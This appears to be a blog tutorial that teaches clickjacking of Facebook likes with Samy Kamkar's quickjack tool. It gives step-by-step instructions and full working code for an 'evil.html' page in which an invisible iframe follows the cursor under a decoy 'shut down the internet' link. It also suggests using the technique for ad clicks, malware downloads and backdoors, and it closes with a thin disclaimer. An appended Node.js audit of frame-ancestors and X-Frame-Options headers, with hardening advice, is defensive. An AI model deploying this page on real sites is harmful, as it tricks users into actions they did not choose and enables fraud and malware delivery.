
by Matt (follow him on https://medium.com/@Matt_S)
Clickjacking is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.
It can be used for many purposes; it all depends on your creativity, so let’s brainstorm a bit on how this technique gets used. You can have a user click on a fake button to get likes, follow you on Twitter, click ads, download malware, open a Java backdoor, or basically click any content that can be embedded. The possibilities are endless.
So where to start? Let’s use the quickjack tool to get you started. This tool was developed by Samy Kamkar, a security researcher famous for his “Samy is a hero” worm on MySpace.com, pretty cool guy. The tool simplifies clickjacking considerably, without having to code anything from scratch.
Difficulty level: Noob
Where is the tool? You can download it from Samy’s Git and install it on your server, or use it directly here.
Let’s get busy clickjacking Facebook likes.
What you need:
– Text editor
– Ftp App
– A web server
1. Open a text editor of your choice
2. Create a new file
3. Name it code.html
We need to get the code for the Like button we want our users to click.
Select the page you want to like:
– for the sake of it, let’s use the default page https://developers.facebook.com/docs/plugins/
– Uncheck “friends faces”
– Uncheck “include share button”
– Click “Get Code”
Copy the code into code.html and save your file.
<div id="fb-root"></div>
<script>
(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.0";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
</script>
<div class="fb-like" data-href="https://developers.facebook.com/docs/plugins/" data-layout="standard" data-action="like" data-show-faces="false" data-share="false"></div>
Upload the file to your server. It should look like this.

Now go to QuickJackTool

In the textbox, insert the URL of the code.html page you just created.

Now click on the “Like” button; a red cross should appear on top of it.

Click on “I’m done”; this should generate new code on the next page.
Copy the generated code from the text box.
1. Create a new html file.
2. Let’s call it evil.html
3. Paste the code.
<style>body{margin:0px;padding:0px;}</style>
<div style="overflow:hidden;width:1px;height:1px;position:relative;" id=v>
  <iframe id="cksl7" name="cksl7" src="http://mattsevely.com/code.html"
          style="border:0px;left:-44px;top:-20px;position:absolute;filter:alpha(opacity=0);z-index:1;opacity:0;overflow:hidden;width:855px;height:664px;"></iframe>
</div>
<script>
var d=document;
if(!d.all)d.captureEvents(Event.MOUSEMOVE);
d.onmousemove=function(e){
  var i=d.getElementById("v").style;
  i.left=d.all?event.clientX+d.body.scrollLeft:e.pageX;
  i.top=d.all?event.clientY+d.body.scrollTop:e.pageY;
};
</script>
<script src="https://code.jquery.com/jquery-2.1.3.min.js"></script>
<script>
$(function(){
  var i=-1;
  $("#cksl7").hover(function(){i=$(this).closest("#v").attr("qjid");},function(){i=-1;});
  $(window).focus();
  $(window).blur(function(){document.getElementById("v").style.visibility="hidden";});
});
$(window).focus()
</script>
4. Add the following code right after the code you just pasted into evil.html. This is the visible link the user will click (reddit.com is where the user is redirected after clicking the “evil” link that makes him like the page).
<a href="http://reddit.com"> click here to shut down the internet </a>
5. Save the evil.html file and upload it to your server (same folder as code.html).
You are done!
The result will be this.
So when the user clicks “Click to shut down the internet” once, they are actually liking the Facebook plugins page, and since the link didn’t appear to “work”, the user will instinctively click again; on the second click the user is redirected to Reddit.com.
REMEMBER: to unlike the Facebook plugins page that you “liked”, if you clicked on the “evil” link.
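The trick only works because the framed page lets any other site embed it. As an added example that is not part of the original post or of Samy’s quickjack, here is a small Node.js audit that reads a response’s headers and decides whether an unrelated origin could frame it the way evil.html frames code.html, together with the header pair a site owner sets to stop it. The sample header sets at the bottom are constructed for the demonstration, not captured traffic.

```javascript
// Added example (not from the original post or from quickjack): decide from
// response headers whether a page can be put in a cross-origin iframe, which
// is the precondition for the clickjacking trick shown in this tutorial.
// Mitigations checked: CSP frame-ancestors (authoritative when present) and
// the older X-Frame-Options header.

// Case-insensitive header lookup. Values may be strings or arrays (Node's
// http module uses arrays for repeated set-cookie headers).
function getHeader(headers, name) {
  const wanted = name.toLowerCase();
  for (const [key, value] of Object.entries(headers)) {
    if (key.toLowerCase() === wanted) {
      return Array.isArray(value) ? value.join(", ") : String(value);
    }
  }
  return null;
}

// Parse a CSP string into Map<directiveName, sourceTokens>. Browsers honour
// only the first occurrence of a directive, so later duplicates are dropped.
function parseCsp(csp) {
  const directives = new Map();
  for (const part of csp.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// Returns { framable, reason }: framable is true when an unrelated origin
// could embed the response in an iframe.
function assessFramingProtection(headers) {
  const csp = getHeader(headers, "content-security-policy");
  if (csp !== null) {
    const ancestors = parseCsp(csp).get("frame-ancestors");
    if (ancestors !== undefined) {
      // When frame-ancestors is present, browsers ignore X-Frame-Options.
      const sources = ancestors.map((s) => s.toLowerCase());
      if (sources.length === 0 || sources.includes("'none'")) {
        return { framable: false, reason: "CSP frame-ancestors forbids all framing" };
      }
      // "*" or a bare scheme such as https: lets any site on that scheme frame the page.
      if (sources.some((s) => s === "*" || /^[a-z][a-z0-9+.-]*:$/.test(s))) {
        return { framable: true, reason: `CSP frame-ancestors is too permissive: ${ancestors.join(" ")}` };
      }
      return { framable: false, reason: `CSP frame-ancestors restricts framing to: ${ancestors.join(" ")}` };
    }
  }
  const xfo = getHeader(headers, "x-frame-options");
  if (xfo !== null) {
    const value = xfo.trim().toLowerCase();
    if (value === "deny" || value === "sameorigin") {
      return { framable: false, reason: `X-Frame-Options: ${xfo.trim()}` };
    }
    // ALLOW-FROM was never widely supported and current browsers ignore it,
    // as they ignore any other unrecognised value, so it gives no protection.
    return { framable: true, reason: `X-Frame-Options value not enforced by browsers: ${xfo.trim()}` };
  }
  return { framable: true, reason: "no frame-ancestors directive and no X-Frame-Options header" };
}

// The header pair a site owner sets on pages that must never be framed.
// X-Frame-Options is kept only for browsers without CSP level 2 support.
function hardenedHeaders() {
  return {
    "Content-Security-Policy": "frame-ancestors 'none'",
    "X-Frame-Options": "DENY",
  };
}

// Constructed sample responses for the demonstration (not captured traffic).
const SAMPLE_RESPONSES = {
  "no protection (like code.html above)": {},
  "legacy header only": { "X-Frame-Options": "SAMEORIGIN" },
  "CSP present but permissive": { "Content-Security-Policy": "default-src 'self'; frame-ancestors *" },
  "hardened": hardenedHeaders(),
};

for (const [label, headers] of Object.entries(SAMPLE_RESPONSES)) {
  const result = assessFramingProtection(headers);
  console.log(`${label}: ${result.framable ? "FRAMABLE" : "protected"} (${result.reason})`);
}
```

Setting the headers is the fix the site being framed has to ship; a JavaScript frame-buster of the `if (top !== self)` kind is weaker, because the embedding page can neutralise it with a sandboxed iframe, while the browser enforces `frame-ancestors` before any script in the framed page runs.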
This tutorial is strictly for educational purposes, the way you use that tool is solely your responsibility. Not mine, nor Samy’s.
Have fun.